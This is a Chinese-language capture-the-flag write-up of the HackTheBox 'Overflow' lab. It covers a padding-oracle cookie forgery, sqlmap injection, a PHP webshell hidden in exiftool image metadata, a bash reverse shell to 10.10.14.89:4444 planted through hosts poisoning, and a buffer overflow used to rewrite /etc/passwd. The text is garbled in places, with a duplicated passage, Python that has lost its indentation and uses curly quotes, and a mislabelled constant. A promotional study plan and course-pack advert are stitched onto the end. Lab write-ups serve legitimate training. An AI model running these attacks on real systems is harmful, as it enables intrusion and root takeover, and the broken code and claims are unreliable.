HackTheBox之Overflow靶机

前言

这是一台困难靶机，靶机内容主要考察了web漏洞利用，逆向，权限维持，提权等各个方面的内容，这个靶机非常适合入门逆向，并且对提升渗透思维帮助很大，我从中也获益良多。

解题思路

信息收集

靶机主要开放了ssh，web和smtp服务。

登录web页面后发现存在注册表单，注册登录后并没有发现任何有价值的信息。

使用目录模糊工具fuzz目录，发现logs.php文件，但是显示未认证。

没有发现其他线索后，抓包修改cookie值，发现一个新的目录../logout.php?err=1

跳转到这个页面后，发现可能存在填充提示攻击。

漏洞利用

padbuster爆破

使用padbuster对cookie进行填充提示攻击爆破。

padbuster http://overflow.htb/home/index.php cU5G2ionAVcCQ6BDjl2Ioo24AlC20Uqx 8 -cookies auth=cU5G2ionAVcCQ6BDjl2Ioo24AlC20Uqx -encoding 0

使用padbuster工具对Admin的cookie值进行爆破，得到admin账户的cookie值。

padbuster http://overflow.htb/home/index.php cU5G2ionAVcCQ6BDjl2Ioo24AlC20Uqx 8 -cookies auth=cU5G2ionAVcCQ6BDjl2Ioo24AlC20Uqx -encoding 0 -plaintext="user=Admin"

替换掉普通账户的cookie值并刷新页面，发现存在一个Admin Panel页面。

发现是一个made simple CMS框架，在EDB上发现了很多nDay，但是全都是基于认证后的。

SQL注入

无果，当点击Logs页面并查看源代码时，发现了一个新的目录文件../config/admin_last_login.js

访问这个js文件时，发现了一个新的url地址http://overflow.htb/home/logs.php?name=admin

通过目录扫描发现了版本文件，并发现CMS版本是2.2.8，在EDB查找中发现是存在SQL注入漏洞的。

直接上SQLMAP，发现存在GET类型注入。

sqlmap -u "http://overflow.htb/home/logs.php?name=admin" --cookie="auth=BAitGdYOupMjA3gl1aFoOwAAAAAAAAAA"

对数据库进行注入。

sqlmap -u "http://overflow.htb/home/logs.php?name=admin" --cookie="auth=BAitGdYOupMjA3gl1aFoOwAAAAAAAAAA" --dbs

对cmsmsdb数据表进行注入，发现cms_users和cms_siteprefs数据表。

sqlmap -u "http://overflow.htb/home/logs.php?name=admin" --cookie="auth=BAitGdYOupMjA3gl1aFoOwAAAAAAAAAA" -D cmsmsdb

对cms_users数据表的字段进行注入，发现了admin和editor账户的哈希值。

紧接着需要对salt值进行注入，值存在于cms_siteprefs表中，得到盐值6c2d17f37e226486

得到salt值后，需要修改EDB之前的EXP对应的字段值。

结果admin账户的爆破失败，但是可以得到editor账户的明文值。

文件上传漏洞

使用editor账号进行登录CMS，但是并没有发现能够利用成功的点。意外发现一个子域名frvbuild-job.overflow.htb

添加进hosts文件后访问，发现又是一个表单，使用editor账户可以登录成功。

在用户配置处存在一个上传点，当尝试上传PHP的webshell时，发现被过滤。

上传一张正常图片时，发现输出的是exiftool格式的内容。

尝试生成一个图片马并加以利用。

exiftool -DocumentName="<h1>test<br>



<?php if(isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd=(\$_REQUEST['cmd']);system(\$cmd);echo '<pre>'}__halt__compiler();?></h1>" webshell.jpg

但是发现图片上传后，被重命名了，所以没办法利用。

最后，发现在EDB上发现exiftool工具的利用脚本，而且在MSF上也能成功找到利用脚本。

需要注意的是，如果使用的是最新的kali，那么payload需要替换成cmd/unix/reverse_netcat，要不然不能成功接收shell。

提权

www-data提权tester

上传linpeas.sh脚本，发现了一个数据库密码。

查看完/etc/passwd文件后，发现存在一个developer和tester账户，使用该密码可以成功登录developer账户。

在/opt目录下发现一个脚本commontask.sh，脚本内容中出现一个不存在的域名。taskmanage.overflow.htb。可以尝试修改hosts文件，将域名指向到本机的ip上进行木马投毒，task.sh脚本的内容如下。

bash -i >& /dev/tcp/10.10.14.89/4444 0>&1

开启本地http服务，接收tester账户的shell。

tester提权root

因为获取到的shell终端不稳定，所以需要对tester用户做权限持久化。

我们也可以上传linpeas.sh脚本进行漏洞探索，但是这边手工查找到/opt/file_encrypt目录下存在一个文件file_encrypt，这个文件是拥有root权限的。

逆向工程

对这个程序进行逆向分析，定位到check_pin函数上，C伪代码如下。

void check_pin(void)
{
	undefined local_2c[20];
	int local_18;
	long local_14;
	int local_10;
	
	local_10 = rand();
	local_14 = random();
	printf("This is the code: %i, Enter the Pin: ",local_10);
	__isoc99_scanf(&DAT_00010d1d,&local_18);
	if(local_14 == local_18)
	{
		printf("name: ");
		__isoc99_scanf(&DAT_00010c63,&local_2c);
		puts("Thanks for checking.You can give you feedback for improves");
	}else{
		puts("Wrong Pin");
	}
	return;
}

不难看出代码逻辑，我们输入的值保存到local_18这个变量上，然后和local_14的变量值进行比较，而local_14的变量值是通过random函数生成的，我们定位到random函数后，C伪代码如下。

long random(void)
{
	unit in_stack_00000004;
	uint local_c;
	int local_8;
	
	local_c = 0x6b8b4567;
	for(local_8 = 0;local_8 < 10;local_8=local_8+1)
	{
		local_c = local_c * 0x59 + 0x14;
	}
	return local_c ^ in_stack_00000004;
}

使用gdb查看程序，发现程序最后进行了异或运算，并且程序是从0x6b8b4567这个地址开始的。

弄清楚程序，那么就可以编写利用脚本了，运行以下脚本得到PIN值-202976456

#!/usr/bin/python3
import ctypes
local_c_initial = 0x6b8b4567
local_c = 0x6b8b4567
local_8 = 0
while (local_8 <10):
local_c = local_c * 0x59 + 0x14
local_8 = local_8 + 1

PIN = ctypes.c_int(local_c ^ local_c_initial).value 
print(“The PIN code is: “, PIN)

缓冲区溢出漏洞

输入很多个字符，检查可能存在缓冲区溢出。

使用msf-pattern_offset识别出在44处溢出偏移量。

那么就可以使用一段字符填充点EIP寄存器从而达到溢出。

python3 -c "print('\x41'*44+'\x5b\x58\x55\x56')"

那么就产生了一个新的思路，可以将passwd文件复制一份，通过这个漏洞溢出填充新的账户字段进原本的passwd文件上。

#!/usr/bin/python3

source = open('/tmp/passwd','rb').read()
dest = open('tmp/passwd2','wb')

for i in source:
    dest.write(bytes([i^0x9b]))

，通过这个漏洞溢出填充新的账户字段进原本的passwd文件上。

#!/usr/bin/python3

source = open('/tmp/passwd','rb').read()
dest = open('tmp/passwd2','wb')

for i in source:
    dest.write(bytes([i^0x9b]))

[外链图片转存中…(img-fRcmIGc5-1690164656733)]

[外链图片转存中…(img-BplYsNyw-1690164656734)]

接下来我将给各位同学划分一张学习计划表！

学习计划

那么问题又来了，作为萌新小白，我应该先学什么，再学什么？
既然你都问的这么直白了，我就告诉你，零基础应该从什么开始学起：

阶段一：初级网络安全工程师

接下来我将给大家安排一个为期1个月的网络安全初级计划，当你学完后，你基本可以从事一份网络安全相关的工作，比如渗透测试、Web渗透、安全服务、安全分析等岗位；其中，如果你等保模块学的好，还可以从事等保工程师。

综合薪资区间6k~15k

1、网络安全理论知识（2天）
①了解行业相关背景，前景，确定发展方向。
②学习网络安全相关法律法规。
③网络安全运营的概念。
④等保简介、等保规定、流程和规范。（非常重要）

2、渗透测试基础（1周）
①渗透测试的流程、分类、标准
②信息收集技术：主动/被动信息搜集、Nmap工具、Google Hacking
③漏洞扫描、漏洞利用、原理，利用方法、工具（MSF）、绕过IDS和反病毒侦察
④主机攻防演练：MS17-010、MS08-067、MS10-046、MS12-20等

3、操作系统基础（1周）
①Windows系统常见功能和命令
②Kali Linux系统常见功能和命令
③操作系统安全（系统入侵排查/系统加固基础）

4、计算机网络基础（1周）
①计算机网络基础、协议和架构
②网络通信原理、OSI模型、数据转发流程
③常见协议解析（HTTP、TCP/IP、ARP等）
④网络攻击技术与网络安全防御技术
⑤Web漏洞原理与防御：主动/被动攻击、DDOS攻击、CVE漏洞复现

5、数据库基础操作（2天）
①数据库基础
②SQL语言基础
③数据库安全加固

6、Web渗透（1周）
①HTML、CSS和JavaScript简介
②OWASP Top10
③Web漏洞扫描工具
④Web渗透工具：Nmap、BurpSuite、SQLMap、其他（菜刀、漏扫等）

那么，到此为止，已经耗时1个月左右。你已经成功成为了一名“脚本小子”。那么你还想接着往下探索吗？

阶段二：中级or高级网络安全工程师（看自己能力）

综合薪资区间15k~30k

7、脚本编程学习（4周）
在网络安全领域。是否具备编程能力是“脚本小子”和真正网络安全工程师的本质区别。在实际的渗透测试过程中，面对复杂多变的网络环境，当常用工具不能满足实际需求的时候，往往需要对现有工具进行扩展，或者编写符合我们要求的工具、自动化脚本，这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中，想要高效地使用自制的脚本工具来实现各种目的，更是需要拥有编程能力。

零基础入门的同学，我建议选择脚本语言Python/PHP/Go/Java中的一种，对常用库进行编程学习
搭建开发环境和选择IDE，PHP环境推荐Wamp和XAMPP，IDE强烈推荐Sublime；

Python编程学习，学习内容包含：语法、正则、文件、 网络、多线程等常用库，推荐《Python核心编程》，没必要看完

用Python编写漏洞的exp,然后写一个简单的网络爬虫

PHP基本语法学习并书写一个简单的博客系统

熟悉MVC架构，并试着学习一个PHP框架或者Python框架 (可选)

了解Bootstrap的布局或者CSS。

阶段三：顶级网络安全工程师

如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！

学习资料分享

当然，只给予计划不给予学习资料的行为无异于耍流氓，这里给大家整理了一份【282G】的网络安全工程师从入门到精通的学习资料包，可点击下方二维码链接领取哦。